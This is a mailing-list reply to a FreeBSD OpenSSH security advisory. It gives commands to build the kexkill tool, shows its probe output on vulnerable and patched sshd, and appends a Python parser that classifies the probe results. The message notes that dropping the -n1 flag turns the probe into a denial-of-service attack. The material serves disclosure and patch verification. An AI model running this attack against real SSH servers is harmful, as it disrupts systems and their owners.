FreeBSD Security Advisory FreeBSD-SA-16:33.openssh
Dag-Erling Smørgrav
des at des.no
Sun Nov 6 14:59:46 UTC 2016
Xin LI <delphij at gmail.com> writes:
> We will investigate if the statement is true and will issue patches
> for earlier FreeBSD releases, if they are confirmed to be affected.

Hoping to make your life a little easier:

$ git clone https://github.com/dag-erling/kexkill
$ cd kexkill
$ ./autogen.sh && ./configure && make

vulnerable 12.0 system:

$ ./src/kexkill -v -n1 target |& grep -v "sending kexinit"
kexkill: [03] connected
kexkill: [03] got banner: SSH-2.0-OpenSSH_7.2 FreeBSD-20160310
kexkill: [03] sending banner
kexkill: [03] received kexinit
[no more output]
^C

same system after applying SA-16:33:

$ ./src/kexkill -v -n1 target |& grep -v "sending kexinit"
kexkill: [03] connected
kexkill: [03] got banner: SSH-2.0-OpenSSH_7.2 FreeBSD-20160310
kexkill: [03] sending banner
kexkill: [03] received kexinit
kexkill: [03] read(): Connection reset by peer
kexkill: [03] connected
kexkill: [03] got banner: SSH-2.0-OpenSSH_7.2 FreeBSD-20160310
kexkill: [03] sending banner
kexkill: [03] received kexinit
kexkill: [03] write(): Broken pipe
kexkill: [03] connected
kexkill: [03] got banner: SSH-2.0-OpenSSH_7.2 FreeBSD-20160310
kexkill: [03] sending banner
kexkill: [03] received kexinit
kexkill: [03] read(): Connection reset by peer
[...]
^C

Remove -n1 to actually (attempt to) attack the system rather than just
probe it.

DES
--
Dag-Erling Smørgrav - des at des.no
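
Added example, not part of the original message or of the kexkill project: a small parser that classifies a captured `kexkill -v -n1` probe transcript the way the two runs above are read, for checking hosts after applying SA-16:33. The function names and verdict strings are assumptions of this example; the sample transcripts are copied from the message (the patched one shortened to two connections).

```python
import re

LINE = re.compile(r"^kexkill: \[(\d+)\] (.*)$")
# Errors kexkill reported in the message above once the patched sshd dropped it.
DROPPED = ("read(): Connection reset by peer", "write(): Broken pipe")

# Sample transcripts, copied from the message above.
VULNERABLE_RUN = """\
kexkill: [03] connected
kexkill: [03] got banner: SSH-2.0-OpenSSH_7.2 FreeBSD-20160310
kexkill: [03] sending banner
kexkill: [03] received kexinit
[no more output]
"""
PATCHED_RUN = """\
kexkill: [03] connected
kexkill: [03] got banner: SSH-2.0-OpenSSH_7.2 FreeBSD-20160310
kexkill: [03] sending banner
kexkill: [03] received kexinit
kexkill: [03] read(): Connection reset by peer
kexkill: [03] connected
kexkill: [03] got banner: SSH-2.0-OpenSSH_7.2 FreeBSD-20160310
kexkill: [03] sending banner
kexkill: [03] received kexinit
kexkill: [03] write(): Broken pipe
[...]
"""

def sessions(transcript):
    """Split verbose output into one event list per connection, keyed by the [NN] tag."""
    open_by_tag, done = {}, []
    for raw in transcript.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue  # "[no more output]", "[...]", "^C", blank lines
        tag, event = m.groups()
        if event == "connected" and tag in open_by_tag:
            done.append(open_by_tag.pop(tag))  # same tag reconnected: close the old session
        open_by_tag.setdefault(tag, []).append(event)
    return done + list(open_by_tag.values())

def classify(transcript):
    """'vulnerable' assumes the probe was watched long enough for a patched server to drop it."""
    seen = [s for s in sessions(transcript) if "received kexinit" in s]
    for s in seen:
        if any(e in DROPPED for e in s[s.index("received kexinit") + 1:]):
            return "patched"  # server ended the connection after the key exchange began
    return "vulnerable" if seen else "inconclusive"
```
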